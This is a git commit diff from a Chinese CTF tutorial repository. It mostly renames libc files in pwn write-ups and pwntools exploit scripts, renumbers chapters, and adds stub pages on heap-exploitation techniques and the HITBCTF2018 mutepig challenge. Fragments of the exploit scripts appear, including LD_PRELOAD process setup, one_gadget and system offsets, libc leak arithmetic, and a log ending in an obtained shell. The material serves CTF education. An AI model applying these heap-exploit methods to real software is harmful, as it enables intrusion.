This commit is contained in:
firmianay 2018-06-07 17:23:45 +08:00
parent 6301bcc4f8
commit 77551e0470
47 changed files with 146 additions and 99 deletions

View File

@ -68,13 +68,14 @@ GitHub 地址https://github.com/firmianay/CTF-All-In-One
* [3.1.3 栈溢出](doc/3.1.3_stack_overflow.md)
* [3.1.4 返回导向编程ROPx86](doc/3.1.4_rop_x86.md)
* [3.1.5 返回导向编程ROPARM](doc/3.1.5_rop_arm.md)
* [3.1.6 Linux 堆利用(上)](doc/3.1.6_heap_exploit_1.md)
* [3.1.7 Linux 堆利用(中)](doc/3.1.7_heap_exploit_2.md)
* [3.1.8 Linux 堆利用(下)](doc/3.1.8_heap_exploit_3.md)
* [3.1.9 内核 ROP](doc/3.1.9_kernel_rop.md)
* [3.1.10 Linux 内核漏洞利用](doc/3.1.10_linux_kernel_exploit.md)
* [3.1.11 Windows 内核漏洞利用](doc/3.1.11_windows_kernel_exploit.md)
* [3.1.12 竞争条件](doc/3.1.12_race_condition.md)
* [3.1.6 Linux 堆利用(一)](doc/3.1.6_heap_exploit_1.md)
* [3.1.7 Linux 堆利用(二)](doc/3.1.7_heap_exploit_2.md)
* [3.1.8 Linux 堆利用(三)](doc/3.1.8_heap_exploit_3.md)
* [3.1.9 Linux 堆利用(四)](doc/3.1.9_heap_exploit_4.md)
* [3.1.10 内核 ROP](doc/3.1.10_kernel_rop.md)
* [3.1.11 Linux 内核漏洞利用](doc/3.1.11_linux_kernel_exploit.md)
* [3.1.12 Windows 内核漏洞利用](doc/3.1.12_windows_kernel_exploit.md)
* [3.1.13 竞争条件](doc/3.1.13_race_condition.md)
* Reverse
* [3.2.1 patch 二进制文件](doc/3.2.1_patch_binary.md)
* [3.2.2 脱壳技术PE](doc/3.2.2_pe_unpack.md)
@ -163,6 +164,7 @@ GitHub 地址https://github.com/firmianay/CTF-All-In-One
* [6.1.28 pwn ASISCTF2016 b00ks](doc/6.1.28_pwn_asisctf2016_b00ks.md)
* [6.1.29 pwn Insomni'hack_teaserCTF2017 The_Great_Escape_part-3](doc/6.1.29_pwn_insomnictf2017_the_great_escape3.md)
* [6.1.30 pwn HITCONCTF2017 Ghost_in_the_heap](doc/6.1.30_pwn_hitconctf2017_ghost_in_the_heap.md)
* [6.1.31 pwn HITBCTF2018 mutepig](doc/6.1.31_pwn_hitbctf2018_mutepig.md)
* Reverse
* [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md)
* [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md)

View File

@ -1,4 +1,4 @@
# 3.1.9 内核 ROP
# 3.1.10 内核 ROP
- [参考资料](#参考资料)

View File

@ -1,4 +1,4 @@
# 3.1.10 Linux 内核漏洞利用
# 3.1.11 Linux 内核漏洞利用
- [从用户态到内核态](#从用户态到内核态)
- [内核漏洞分类](#内核漏洞分类)

View File

@ -1 +0,0 @@
# 3.1.12 竞争条件

View File

@ -1,4 +1,4 @@
# 3.1.11 Windows 内核漏洞利用
# 3.1.12 Windows 内核漏洞利用
- [参考资料](#参考资料)

View File

@ -0,0 +1 @@
# 3.1.13 竞争条件

View File

@ -0,0 +1,19 @@
# 3.1.9 Linux 堆利用(四)
- [house_of_rabbit](#house_of_rabbit)
- [house_of_roman](#house_of_roman)
- [参考资料](#参考资料)
[下载文件](../src/Others/3.1.6_heap_exploit)
#### house_of_rabbit
#### house_of_roman
## 参考资料
- [House of Rabbit - Heap exploitation technique bypassing ASLR](http://shift-crops.hatenablog.com/entry/2017/09/17/213235)
- https://github.com/shift-crops/House_of_Rabbit
- [House_of_Roman](https://gist.github.com/romanking98/9aab2804832c0fb46615f025e8ffb0bc)
- https://github.com/romanking98/House-Of-Roman

View File

@ -6,13 +6,14 @@
* [3.1.3 栈溢出](3.1.3_stack_overflow.md)
* [3.1.4 返回导向编程ROPx86](3.1.4_rop_x86.md)
* [3.1.5 返回导向编程ROPARM](3.1.5_rop_arm.md)
* [3.1.6 Linux 堆利用(上)](3.1.6_heap_exploit_1.md)
* [3.1.7 Linux 堆利用(中)](3.1.7_heap_exploit_2.md)
* [3.1.8 Linux 堆利用(下)](3.1.8_heap_exploit_3.md)
* [3.1.9 内核 ROP](3.1.9_kernel_rop.md)
* [3.1.10 Linux 内核漏洞利用](3.1.10_linux_kernel_exploit.md)
* [3.1.11 Windows 内核漏洞利用](3.1.11_windows_kernel_exploit.md)
* [3.1.12 竞争条件](3.1.12_race_condition.md)
* [3.1.6 Linux 堆利用(一)](3.1.6_heap_exploit_1.md)
* [3.1.7 Linux 堆利用(二)](3.1.7_heap_exploit_2.md)
* [3.1.8 Linux 堆利用(三)](3.1.8_heap_exploit_3.md)
* [3.1.9 Linux 堆利用(四)](3.1.9_heap_exploit_4.md)
* [3.1.10 内核 ROP](3.1.10_kernel_rop.md)
* [3.1.11 Linux 内核漏洞利用](3.1.11_linux_kernel_exploit.md)
* [3.1.12 Windows 内核漏洞利用](3.1.12_windows_kernel_exploit.md)
* [3.1.13 竞争条件](3.1.13_race_condition.md)
* Reverse
* [3.2.1 patch 二进制文件](3.2.1_patch_binary.md)
* [3.2.2 脱壳技术PE](3.2.2_pe_unpack.md)

View File

@ -15,7 +15,7 @@ $ file 1000levels
$ checksec -f 1000levels
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH No 0 6 1000levels
$ strings libc.so.6 | grep "GNU C"
$ strings libc-2.23.so | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu9) stable release version 2.23, by Roland McGrath et al.
Compiled by GNU CC version 5.4.0 20160609.
```
@ -351,7 +351,7 @@ vaddr=0x00201fd0 paddr=0x00001fd0 type=SET_64 system
对于第一个问题,我们有不需要参数的 one-gadget 可以用,通过将输入的第二个数设置为偏移,即可通过程序的计算将 system 修改为 one-gadget。
```
$ one_gadget libc.so.6
$ one_gadget libc-2.23.so
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
@ -456,7 +456,7 @@ firmy
from pwn import *
#context.log_level = 'debug'
io = process(['./1000levels'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./1000levels'], env={'LD_PRELOAD':'./libc-2.23.so'})
one_gadget = 0x4526a
system_offset = 0x45390

View File

@ -15,7 +15,7 @@ sentosa: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically lin
$ checksec -f sentosa
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH Yes 1 3 sentosa
$ strings libc.so.6| grep "GNU C"
$ strings libc-2.23.so | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu4) stable release version 2.23, by Roland McGrath et al.
Compiled by GNU CC version 5.4.0 20160609.
```
@ -715,8 +715,8 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./sentosa'], env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF('libc.so.6')
io = process(['./sentosa'], env={'LD_PRELOAD':'./libc-2.23.so'})
libc = ELF('libc-2.23.so')
def start_proj(length, name, price, area, capacity):
io.sendlineafter("Exit\n", '1')

View File

@ -15,7 +15,7 @@ gundam: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically link
$ checksec -f gundam
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH Yes 0 4 gundam
$ strings libc.so.6 | grep "GNU C"
$ strings libc-2.26.so | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.26-0ubuntu2.1) stable release version 2.26, by Roland McGrath et al.
Compiled by GNU CC version 6.4.0 20171010.
```
@ -596,10 +596,10 @@ gdb-peda$ x/6gx 0x555555757b50-0x10
0x555555757b60: 0x0000000000000000 0x0000000000000000
gdb-peda$ vmmap libc
Start End Perm Name
0x00007ffff79f8000 0x00007ffff7bce000 r-xp /home/firmy/gundam/libc.so.6
0x00007ffff7bce000 0x00007ffff7dce000 ---p /home/firmy/gundam/libc.so.6
0x00007ffff7dce000 0x00007ffff7dd2000 r--p /home/firmy/gundam/libc.so.6
0x00007ffff7dd2000 0x00007ffff7dd4000 rw-p /home/firmy/gundam/libc.so.6
0x00007ffff79f8000 0x00007ffff7bce000 r-xp /home/firmy/gundam/libc-2.26.so
0x00007ffff7bce000 0x00007ffff7dce000 ---p /home/firmy/gundam/libc-2.26.so
0x00007ffff7dce000 0x00007ffff7dd2000 r--p /home/firmy/gundam/libc-2.26.so
0x00007ffff7dd2000 0x00007ffff7dd4000 rw-p /home/firmy/gundam/libc-2.26.so
gdb-peda$ p 0x00007ffff7dd2c78 - 0x00007ffff79f8000
$1 = 0x3dac78
```
@ -696,9 +696,9 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./gundam'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./gundam'], env={'LD_PRELOAD':'./libc-2.26.so'})
#elf = ELF('gundam')
libc = ELF('libc.so.6')
libc = ELF('libc-2.26.so')
def build(name):
io.sendlineafter("choice : ", '1')

View File

@ -15,7 +15,7 @@ SecretHolder: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically l
$ checksec -f SecretHolder
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 0 2 SecretHolder
$ strings libc.so.6 | grep "GNU C"
$ strings libc-2.23.so | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Compiled by GNU CC version 5.3.1 20160413.
```
@ -554,9 +554,9 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./SecretHolder'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./SecretHolder'], env={'LD_PRELOAD':'./libc-2.23.so'})
elf = ELF('SecretHolder')
libc = ELF('libc.so.6')
libc = ELF('libc-2.23.so')
small_ptr = 0x006020b0
big_ptr = 0x006020a0

View File

@ -15,7 +15,7 @@ SleepyHolder: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically l
$ checksec -f SleepyHolder
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 0 2 SleepyHolder
$ strings libc.so.6 | grep "GNU C"
$ strings libc-2.23.so | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Compiled by GNU CC version 5.3.1 20160413.
```
@ -525,9 +525,9 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./SleepyHolder'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./SleepyHolder'], env={'LD_PRELOAD':'./libc-2.23.so'})
elf = ELF('SleepyHolder')
libc = ELF('libc.so.6')
libc = ELF('libc-2.23.so')
small_ptr = 0x006020d0
big_ptr = 0x006020c0

View File

@ -15,7 +15,7 @@ houseoforange: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamical
$ checksec -f houseoforange
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH Yes 1 3 houseoforange
$ strings libc.so.6 | grep "GNU C"
$ strings libc-2.23.so | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Compiled by GNU CC version 5.3.1 20160413.
```
@ -744,8 +744,8 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./houseoforange'], env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF('libc.so.6')
io = process(['./houseoforange'], env={'LD_PRELOAD':'./libc-2.23.so'})
libc = ELF('libc-2.23.so')
def build(size, name):
io.sendlineafter("Your choice : ", '1')

View File

@ -15,7 +15,7 @@ $ file 300
$ checksec -f 300
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH Yes 0 2 300
$ strings libc.so.6 | grep "GNU C"
$ strings libc-2.24.so | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.24-9ubuntu2.2) stable release version 2.24, by Roland McGrath et al.
Compiled by GNU CC version 6.3.0 20170406.
```
@ -434,12 +434,6 @@ def pwn():
```
python exp.py
[+] Starting local process './300': pid 5158
[*] '/home/firmyy/300/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] libc_base address: 0x7efdcef24000
[*] heap address: 0x5624a7a3c000
[*] _IO_list_all address: 0x7efdcf2e6500
@ -462,8 +456,8 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./300'], env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF('libc.so.6')
io = process(['./300'], env={'LD_PRELOAD':'./libc-2.24.so'})
libc = ELF('libc-2.24.so')
def alloc(idx):
io.sendlineafter("free\n", '1')

View File

@ -15,7 +15,7 @@ b00ks: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linke
$ checksec -f b00ks
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Full RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH No 0 2 b00ks
$ strings libc.so.6 | grep "GNU C"
$ strings libc-2.23.so | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu10) stable release version 2.23, by Roland McGrath et al.
Compiled by GNU CC version 5.4.0 20160609.
```

View File

@ -15,7 +15,7 @@ ghost_in_the_heap: ELF 64-bit LSB pie executable x86-64, version 1 (SYSV), dynam
$ checksec -f ghost_in_the_heap
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH Yes 1 2 ghost_in_the_heap
$ strings libc.so.6 | grep "GNU C"
$ strings libc-2.24.so | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.24-9ubuntu2.2) stable release version 2.24, by Roland McGrath et al.
Compiled by GNU CC version 6.3.0 20170406.
```

View File

@ -0,0 +1,30 @@
# 6.1.31 pwn HITBCTF2018 mutepig
- [题目复现](#题目复现)
- [题目解析](#题目解析)
- [漏洞利用](#漏洞利用)
- [参考资料](#参考资料)
[下载文件](../src/writeup/6.1.31_pwn_hitbctf2018_mutepig)
## 题目复现
```
$ file mutepig
mutepig: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=180b126011ab0d74ab49d0c3c52a41e85155a6a9, stripped
[firmy@firmy-pc mutepip]$ checksec -f mutepig
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 0 1 mutepig
$ strings libc-2.23.so | grep "GNU C"
GNU C Library (GNU libc) stable release version 2.23, by Roland McGrath et al.
Compiled by GNU CC version 8.1.0.
```
64 位程序,开启了 Canary 和 NX。
## 题目解析
## 漏洞利用
## 参考资料
- https://www.xctf.org.cn/library/details/hitb-quals-2018/#mutepig-pwn

View File

@ -15,6 +15,9 @@ freenote: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linke
$ checksec -f freenote
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 0 2 freenote
$ strings libc-2.19.so | grep "GNU C"
GNU C Library (Ubuntu EGLIBC 2.19-0ubuntu6.6) stable release version 2.19, by Roland McGrath et al.
Compiled by GNU CC version 4.8.2.
```
因为没有 PIE即使本机开启 ASLR 也没有关系。
@ -101,7 +104,7 @@ Aborted
在 Ubuntu 14.04 上把程序跑起来:
```
$ socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc.so_1 ./freenote" &
$ socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc-2.19.so ./freenote" &
```
@ -713,10 +716,10 @@ Start End Offset Perm Path
0x0000000000603000 0x0000000000625000 0x0000000000000000 rw- [heap]
gef➤ vmmap libc
Start End Offset Perm Path
0x00007ffff7a15000 0x00007ffff7bd0000 0x0000000000000000 r-x /home/firmy/libc.so.6_1
0x00007ffff7bd0000 0x00007ffff7dcf000 0x00000000001bb000 --- /home/firmy/libc.so.6_1
0x00007ffff7dcf000 0x00007ffff7dd3000 0x00000000001ba000 r-- /home/firmy/libc.so.6_1
0x00007ffff7dd3000 0x00007ffff7dd5000 0x00000000001be000 rw- /home/firmy/libc.so.6_1
0x00007ffff7a15000 0x00007ffff7bd0000 0x0000000000000000 r-x /home/firmy/libc-2.19.so
0x00007ffff7bd0000 0x00007ffff7dcf000 0x00000000001bb000 --- /home/firmy/libc-2.19.so
0x00007ffff7dcf000 0x00007ffff7dd3000 0x00000000001ba000 r-- /home/firmy/libc-2.19.so
0x00007ffff7dd3000 0x00007ffff7dd5000 0x00000000001be000 rw- /home/firmy/libc-2.19.so
```
为了泄漏堆地址,我们需要释放 2 个不相邻且不会被合并进 top chunk 里的 chunk所以我们创建 4 个笔记,可以看到由初始化阶段创建的 Notes 和 Note 结构体:
@ -840,7 +843,7 @@ gef➤ x/20gx 0x00007ffff7dd37b8-0x78
```
我们看到 `__malloc_hook` 在这个地址 `0x00007ffff7dd37b8-0x78` 的地方。其实 `0x7ffff7dd3760` 地方开始就是 `main_arena`,但在这个 libc 里符号被 stripped 扔掉了。看一下 `__malloc_hook` 在 libc 中的偏移:
```
$ readelf -s libc.so.6_1 | grep __malloc_hook
$ readelf -s libc-2.19.so | grep __malloc_hook
1079: 00000000003be740 8 OBJECT WEAK DEFAULT 31 __malloc_hook@@GLIBC_2.2.5
```
因为偏移是不变的,我们总是可以计算出 libc 的地址:
@ -1045,9 +1048,9 @@ firmy
```python
from pwn import *
io = process(['./freenote'], env={'LD_PRELOAD':'./libc.so.6_1'})
io = process(['./freenote'], env={'LD_PRELOAD':'./libc-2.19.so'})
elf = ELF('freenote')
libc = ELF('libc.so.6_1')
libc = ELF('libc-2.19.so')
def newnote(x):
io.recvuntil("Your choice: ")

View File

@ -457,12 +457,6 @@ Bingo!!!
```
$ python2 exp.py
[+] Opening connection to 127.0.0.1 on port 10001: Done
[*] '/usr/lib/libc-2.26.so'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Switching to interactive mode
$ whoami
firmy

View File

@ -16,6 +16,9 @@ main.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linke
$ checksec -f main.bin
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 0 10 main.bin
$ strings libc-2.23.so | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu9) stable release version 2.23, by Roland McGrath et al.
Compiled by GNU CC version 5.4.0 20160609.
```
64 位程序,保护措施除了 PIE 都开启了。
@ -42,7 +45,7 @@ $ python2 -c 'print "90"*33' > nop.txt
最后把它运行起来:
```
socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc.so.6 ./main.elf" &
socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc-2.23.so ./main.elf" &
```
@ -952,7 +955,7 @@ p.recvuntil('Name: ')
leak = u64(p.recv(6).ljust(8, '\x00'))
libc = leak - 0x3c4b78 # 0x3c4b78 = leak - libc
system = libc + 0x045390 # $ readelf -s libc.so.6 | grep system@
system = libc + 0x045390 # $ readelf -s libc-2.23.so | grep system@
log.info("leak => 0x%x" % leak)
log.info("libc => 0x%x" % libc)

View File

@ -31,6 +31,7 @@
* [6.1.28 pwn ASISCTF2016 b00ks](6.1.28_pwn_asisctf2016_b00ks.md)
* [6.1.29 pwn Insomni'hack_teaserCTF2017 The_Great_Escape_part-3](6.1.29_pwn_insomnictf2017_the_great_escape3.md)
* [6.1.30 pwn HITCONCTF2017 Ghost_in_the_heap](6.1.30_pwn_hitconctf2017_ghost_in_the_heap.md)
* [6.1.31 pwn HITBCTF2018 mutepig](6.1.31_pwn_hitbctf2018_mutepig.md)
* Reverse
* [6.2.1 re XHPCTF2017 dont_panic](6.2.1_re_xhpctf2017_dont_panic.md)
* [6.2.2 re ECTF2016 tayy](6.2.2_re_ectf2016_tayy.md)

View File

@ -3,7 +3,7 @@
from pwn import *
#context.log_level = 'debug'
io = process(['./1000levels'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./1000levels'], env={'LD_PRELOAD':'./libc-2.23.so'})
one_gadget = 0x4526a
system_offset = 0x45390

View File

@ -4,8 +4,8 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./sentosa'], env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF('libc.so.6')
io = process(['./sentosa'], env={'LD_PRELOAD':'./libc-2.23.so'})
libc = ELF('libc-2.23.so')
def start_proj(length, name, price, area, capacity):
io.sendlineafter("Exit\n", '1')

View File

@ -4,9 +4,9 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./gundam'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./gundam'], env={'LD_PRELOAD':'./libc-2.26.so'})
#elf = ELF('gundam')
libc = ELF('libc.so.6')
libc = ELF('libc-2.26.so')
def build(name):
io.sendlineafter("choice : ", '1')

View File

@ -4,9 +4,9 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./SecretHolder'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./SecretHolder'], env={'LD_PRELOAD':'./libc-2.23.so'})
elf = ELF('SecretHolder')
libc = ELF('libc.so.6')
libc = ELF('libc-2.23.so')
small_ptr = 0x006020b0
big_ptr = 0x006020a0

View File

@ -4,9 +4,9 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./SleepyHolder'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./SleepyHolder'], env={'LD_PRELOAD':'./libc-2.23.so'})
elf = ELF('SleepyHolder')
libc = ELF('libc.so.6')
libc = ELF('libc-2.23.so')
small_ptr = 0x006020d0
big_ptr = 0x006020c0

View File

@ -4,8 +4,8 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./houseoforange'], env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF('libc.so.6')
io = process(['./houseoforange'], env={'LD_PRELOAD':'./libc-2.23.so'})
libc = ELF('libc-2.23.so')
def build(size, name):
io.sendlineafter("Your choice : ", '1')

View File

@ -4,8 +4,8 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./300'], env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF('libc.so.6')
io = process(['./300'], env={'LD_PRELOAD':'./libc-2.24.so'})
libc = ELF('libc-2.24.so')
def alloc(idx):
io.sendlineafter("free\n", '1')

Binary file not shown.

Binary file not shown.

View File

@ -2,9 +2,9 @@
from pwn import *
io = process(['./freenote'], env={'LD_PRELOAD':'./libc.so.6_1'})
io = process(['./freenote'], env={'LD_PRELOAD':'./libc-2.19.so'})
elf = ELF('freenote')
libc = ELF('libc.so.6_1')
libc = ELF('libc-2.19.so')
def newnote(x):
io.recvuntil("Your choice: ")

View File

@ -1 +1 @@
socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc.so_1 ./freenote" &
socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc-2.19.so ./freenote" &

View File

@ -63,7 +63,7 @@ p.recvuntil('Name: ')
leak = u64(p.recv(6).ljust(8, '\x00'))
libc = leak - 0x3c4b78 # 0x3c4b78 = leak - libc
system = libc + 0x045390 # $ readelf -s libc.so.6 | grep system@
system = libc + 0x045390 # $ readelf -s libc-2.23.so | grep system@
log.info("leak => 0x%x" % leak)
log.info("libc => 0x%x" % libc)

View File

@ -1 +1 @@
socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc.so.6 ./main.elf" &
socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc-2.23.so ./main.elf" &